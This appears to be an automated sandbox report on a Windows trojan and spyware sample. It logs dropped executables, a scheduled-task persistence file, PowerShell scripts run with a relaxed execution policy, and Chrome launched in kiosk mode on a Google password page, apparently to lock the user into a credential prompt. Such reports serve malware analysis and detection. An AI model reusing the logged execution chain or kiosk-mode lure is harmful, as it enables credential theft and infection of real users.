Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.8:49710 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .rsrc
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name:
Source: 8a145ab7b3.exe.8.dr Static PE information: section name:
Source: 8a145ab7b3.exe.8.dr Static PE information: section name: .rsrc
Source: 8a145ab7b3.exe.8.dr Static PE information: section name: .idata
Source: 8a145ab7b3.exe.8.dr Static PE information: section name:
Source: cee706a53f.exe.8.dr Static PE information: section name:
Source: cee706a53f.exe.8.dr Static PE information: section name: .rsrc
Source: cee706a53f.exe.8.dr Static PE information: section name: .idata
Source: cee706a53f.exe.8.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D8E530 8_2_00D8E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DC78BB 8_2_00DC78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DC7049 8_2_00DC7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DC8860 8_2_00DC8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D84DE0 8_2_00D84DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DC31A8 8_2_00DC31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DC2D10 8_2_00DC2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DC779B 8_2_00DC779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D84B30 8_2_00D84B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00DB7F36 8_2_00DB7F36
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9977169192779292
Source: file.exe Static PE information: Section: mmzmokro ZLIB complexity 0.9946206450356189
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9977169192779292
Source: skotes.exe.0.dr Static PE information: Section: mmzmokro ZLIB complexity 0.9946206450356189
Source: random[1].exe.8.dr Static PE information: Section: spyqlfjc ZLIB complexity 0.9948946083080424
Source: 8a145ab7b3.exe.8.dr Static PE information: Section: spyqlfjc ZLIB complexity 0.9948946083080424
Source: cee706a53f.exe.8.dr Static PE information: Section: spyqlfjc ZLIB complexity 0.9948946083080424
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@72/19@16/13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8a145ab7b3.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: cee706a53f.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8a145ab7b3.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: cee706a53f.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe "C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000026002\cee706a53f.exe "C:\Users\user\1000026002\cee706a53f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\1000032042\ko.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\1000033142\so.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe "C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=2632 --field-trial-handle=2032,i,16315345913979309898,3304916234650839714,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,13926108917370873368,3944536468102768891,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\1000026002\cee706a53f.exe "C:\Users\user\1000026002\cee706a53f.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe "C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=5736 --field-trial-handle=2032,i,16315345913979309898,3304916234650839714,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=5760 --field-trial-handle=2032,i,16315345913979309898,3304916234650839714,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\1000026002\cee706a53f.exe "C:\Users\user\1000026002\cee706a53f.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe "C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000026002\cee706a53f.exe "C:\Users\user\1000026002\cee706a53f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\1000032042\ko.ps1" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\1000033142\so.ps1" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=2632 --field-trial-handle=2032,i,16315345913979309898,3304916234650839714,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=5736 --field-trial-handle=2032,i,16315345913979309898,3304916234650839714,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=5760 --field-trial-handle=2032,i,16315345913979309898,3304916234650839714,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,13926108917370873368,3944536468102768891,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Section loaded: urlmon.dll Jump to behavior
